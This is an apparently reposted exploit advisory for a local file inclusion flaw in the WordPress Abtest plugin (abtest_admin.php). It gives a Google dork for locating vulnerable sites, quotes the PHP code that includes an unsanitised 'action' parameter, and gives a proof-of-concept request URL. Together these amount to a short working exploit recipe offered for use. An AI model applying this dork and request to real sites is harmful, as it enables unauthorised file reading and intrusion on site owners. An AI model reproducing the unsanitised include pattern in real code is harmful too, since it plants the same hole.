Home / os / win10

WordPress Abtest Local File Inclusion

Posted on 30 November -0001

<HTML><HEAD><TITLE>WordPress Abtest Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
  

# Vulnerable File : abtest_admin.php
 
<?php 

require 'admin/functions.php'; 

if (isset($_GET['action'])) {

  include 'admin/' . $_GET['action'] . '.php';

} else {
  
   include 'admin/list_experiments.php'; 
}
?>

# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
 
# Pics : http://i.imgur.com/jZFKYOc.png
</BODY></HTML>

 

TOP